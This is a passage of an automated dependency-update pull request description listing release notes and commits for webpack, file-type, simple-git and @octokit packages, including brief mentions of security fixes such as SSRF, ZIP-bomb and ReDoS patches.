various identifiers in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added \u003ccode\u003ebase64url\u003c/code\u003e, \u003ccode\u003ebase62\u003c/code\u003e, \u003ccode\u003ebase58\u003c/code\u003e, \u003ccode\u003ebase52\u003c/code\u003e, \u003ccode\u003ebase49\u003c/code\u003e, \u003ccode\u003ebase36\u003c/code\u003e, \u003ccode\u003ebase32\u003c/code\u003e and \u003ccode\u003ebase25\u003c/code\u003e digests.\u003c/li\u003e\n\u003cli\u003e5983843: Provide a stable runtime function variable \u003ccode\u003e__webpack_global__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Improved \u003ccode\u003elocalIdentName\u003c/code\u003e hashing for CSS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e22c48fb: Added module existence check for informative error message in development mode.\u003c/li\u003e\n\u003cli\u003e50689e1: Use the fully qualified class name (or export name) for \u003ccode\u003e[fullhash]\u003c/code\u003e placeholder in CSS modules.\u003c/li\u003e\n\u003cli\u003ed3dd841: Support universal lazy compilation.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed module library export definitions when multiple runtimes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Fixed CSS nesting and CSS custom properties parsing.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't write fragment from URL to filename and apply fragment to module URL.\u003c/li\u003e\n\u003cli\u003eaab1da9: Fixed bugs for \u003ccode\u003ecss/global\u003c/code\u003e type.\u003c/li\u003e\n\u003cli\u003ed3dd841: Compatibility \u003ccode\u003eimport.meta.filename\u003c/code\u003e and \u003ccode\u003eimport.meta.dirname\u003c/code\u003e with \u003ccode\u003eeval\u003c/code\u003e devtools.\u003c/li\u003e\n\u003cli\u003ed3dd841: Handle nested \u003ccode\u003e__webpack_require__\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e728ddb7: The speed of identifier parsing has been improved.\u003c/li\u003e\n\u003cli\u003e0f8b31b: Improve types.\u003c/li\u003e\n\u003cli\u003ed3dd841: Don't corrupt \u003ccode\u003edebugId\u003c/code\u003e injection when \u003ccode\u003ehidden-source-map\u003c/code\u003e is used.\u003c/li\u003e\n\u003cli\u003e2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.\u003c/li\u003e\n\u003cli\u003ed3dd841: Serialize \u003ccode\u003eHookWebpackError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ed3dd841: Added ability to use built-in properties in dotenv and define plugin.\u003c/li\u003e\n\u003cli\u003e3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.\u003c/li\u003e\n\u003cli\u003ed3dd841: Reduce collision for local indent name in CSS.\u003c/li\u003e\n\u003cli\u003ed3dd841: Remove CSS link tags when CSS imports are removed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc\"\u003e\u003ccode\u003e24e3c2d\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20253\"\u003e#20253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2efd21b0b06baa9b1a7f009b336379dcef24c1a5\"\u003e\u003ccode\u003e2efd21b\u003c/code\u003e\u003c/a\u003e fix(re-exports): reexports runtime calculation should not accessing `__WEBPAC...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c5100702335a9cdcb75558ccd80def2329bd4abf\"\u003e\u003ccode\u003ec510070\u003c/code\u003e\u003c/a\u003e fix(security): userinfo bypass vulnerability in HttpUriPlugin allowedUris\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/4b0501c69700963bad1285b56f9cfa74704cb963\"\u003e\u003ccode\u003e4b0501c\u003c/code\u003e\u003c/a\u003e ci: fix release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20252\"\u003e#20252\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c213cecf2906bc41102c3a4cfdd1ad3522d0171\"\u003e\u003ccode\u003e0c213ce\u003c/code\u003e\u003c/a\u003e ci: use \u003ccode\u003e\\\u0026lt;@\u0026amp;1450591255485743204\u0026gt;\u003c/code\u003e over \u003ccode\u003e@here\u003c/code\u003e for discord notificationw\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/5bf8bc51bcfb49d25b73aae450b246cd8b8b423a\"\u003e\u003ccode\u003e5bf8bc5\u003c/code\u003e\u003c/a\u003e refactor: types for benchmarks and tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/505a5e744fbcf4471ddb534bf1d4aebea9643c1b\"\u003e\u003ccode\u003e505a5e7\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20188\"\u003e#20188\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.90.3...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `file-type` from 21.0.0 to 21.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sindresorhus/file-type/releases\"\u003efile-type's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev21.3.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v)  a155cd7\u003c/li\u003e\n\u003cli\u003eFix bound recursive BOM and ID3 detection  370ed91\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.3.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix infinite loop in ASF parser on malformed input (\u003ca href=\"https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473\"\u003ehttps://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473\u003c/a\u003e)  319abf8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.3.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Mach-O Universal (aka \u0026quot;Fat\u0026quot;) binaries and additional architectures (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/779\"\u003e#779\u003c/a\u003e)  d223491\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.2.0...v21.3.0\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.2.0...v21.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.2.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for SPSS data files (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/787\"\u003e#787\u003c/a\u003e)  889f638\u003c/li\u003e\n\u003cli\u003eAdd support for JMP (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/784\"\u003e#784\u003c/a\u003e)  093dba0\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.1.1...v21.2.0\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.1.1...v21.2.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.1.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix handling of partial Gunzip file (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/783\"\u003e#783\u003c/a\u003e)  710e053\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.1.0...v21.1.1\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.1.0...v21.1.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for \u003ccode\u003e.tar.gz\u003c/code\u003e (gunzipped tarball file) (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/763\"\u003e#763\u003c/a\u003e)  eda03a7\u003c/li\u003e\n\u003cli\u003eAdd support for Windows registry (.reg) files   0db61ec 7d2ddcf\u003c/li\u003e\n\u003cli\u003eAdd support for Windows registry hive file (\u003ccode\u003e.dat\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/767\"\u003e#767\u003c/a\u003e)  f8d62be\u003c/li\u003e\n\u003cli\u003eFix: Handle partial unzip (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/773\"\u003e#773\u003c/a\u003e)  7ad3a90\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.0.0...v21.1.0\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.0.0...v21.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/e18028c3cc19441477c3459991fee9770d88c218\"\u003e\u003ccode\u003ee18028c\u003c/code\u003e\u003c/a\u003e 21.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/a155cd71323279de173c54e8c530d300d3854fdd\"\u003e\u003ccode\u003ea155cd7\u003c/code\u003e\u003c/a\u003e Fix ZIP bomb in known-size ZIP probing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/69548179cca2c0ab6a0cc93af59392f8c351cab1\"\u003e\u003ccode\u003e6954817\u003c/code\u003e\u003c/a\u003e Harden parser more\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/370ed9185d112eea4d989fecb843597b1d94cf09\"\u003e\u003ccode\u003e370ed91\u003c/code\u003e\u003c/a\u003e Fix bound recursive BOM and ID3 detection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/d2ecea187c47b944a9c001ae7637f02baed0825a\"\u003e\u003ccode\u003ed2ecea1\u003c/code\u003e\u003c/a\u003e Add a few more safeguards\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/41fcff5de64cfb53da6b2b9c048ebea8213f32c2\"\u003e\u003ccode\u003e41fcff5\u003c/code\u003e\u003c/a\u003e Update readme\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/a8f6934ddd93c3e12cc4ecb0cfc3e8d816d4b9fd\"\u003e\u003ccode\u003ea8f6934\u003c/code\u003e\u003c/a\u003e Fix CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/ad5857e5384874e853cc9c4c29b867f1135a7c30\"\u003e\u003ccode\u003ead5857e\u003c/code\u003e\u003c/a\u003e 21.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/5d2fedf104dc5067b51a1f31410aa60052c74f64\"\u003e\u003ccode\u003e5d2fedf\u003c/code\u003e\u003c/a\u003e Harden parser\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f\"\u003e\u003ccode\u003e319abf8\u003c/code\u003e\u003c/a\u003e Fix infinite loop in ASF parser on malformed input\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.0.0...v21.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `simple-git` from 3.21.0 to 3.32.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/releases\"\u003esimple-git's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esimple-git@3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.30.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ebc77774: Correctly identify current branch name when using \u003ccode\u003egit.status\u003c/code\u003e in a cloned empty repo.\u003c/p\u003e\n\u003cp\u003ePreviously \u003ccode\u003egit.status\u003c/code\u003e would report the current branch name as \u003ccode\u003eNo\u003c/code\u003e. Thank you to \u003ca href=\"https://github.com/MaddyGuthridge\"\u003e\u003ccode\u003e@​MaddyGuthridge\u003c/code\u003e\u003c/a\u003e for identifying this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.28.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2adf47d: Allow repeating git options like \u003ccode\u003e{'--opt': ['value1', 'value2']}\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.27.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/blob/main/simple-git/CHANGELOG.md\"\u003esimple-git's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e22dc93f: Custom binary plugin should support the use of \u003ccode\u003e~\u003c/code\u003e character, used by Windows to shorten long folder names\nand folder names that have spaces in them (eg: \u003ccode\u003eC:\\Program Files\u003c/code\u003e might become \u003ccode\u003eC:\\PROGRA~1\u003c/code\u003e).\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/skyshineb\"\u003e\u003ccode\u003e@​skyshineb\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/a1170e506eeeaade4a242bfbf6d0620d57872364\"\u003e\u003ccode\u003ea1170e5\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257\"\u003e\u003ccode\u003ef704208\u003c/code\u003e\u003c/a\u003e In extension to CVE-2022-25912, switch to case-insensitive check for `protoco...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/4bb20811eb35c0fa5437553cad4eb8ebf8f6f6e6\"\u003e\u003ccode\u003e4bb2081\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/7ae7537737bafc1e6559a28816785b10926fb095\"\u003e\u003ccode\u003e7ae7537\u003c/code\u003e\u003c/a\u003e Match tokens to word boundary\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/c47ad103b07ce768cf69aec63e0c9f7f77a1ab0f\"\u003e\u003ccode\u003ec47ad10\u003c/code\u003e\u003c/a\u003e Lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/8d02097b726c2bc5360b4f55ee3ecb7e09648e4d\"\u003e\u003ccode\u003e8d02097\u003c/code\u003e\u003c/a\u003e Enhanced clone switch detection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f6909a52807512cb4e29a654db2dcd409b019113\"\u003e\u003ccode\u003ef6909a5\u003c/code\u003e\u003c/a\u003e Remove test timeout override\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/77406267ceb19aa901495b6ae414020daf789ebf\"\u003e\u003ccode\u003e7740626\u003c/code\u003e\u003c/a\u003e Update plugin.unsafe.spec.ts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/b562a6c4c1a226d9c7789b72c76784f334c1efac\"\u003e\u003ccode\u003eb562a6c\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/23b070f0a4d320af5e745a42ae6176a629409566\"\u003e\u003ccode\u003e23b070f\u003c/code\u003e\u003c/a\u003e Fix regex for CLONE_OPTIONS constant (\u003ca href=\"https://github.com/steveukx/git-js/tree/HEAD/simple-git/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/steveukx/git-js/commits/simple-git@3.32.3/simple-git\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for simple-git since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/endpoint` from 9.0.5 to 9.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/endpoint.js/releases\"\u003e\u003ccode\u003e@​octokit/endpoint\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003e9.0.6\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e599ff4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e\u003ccode\u003e599ff4f\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.4.0 to 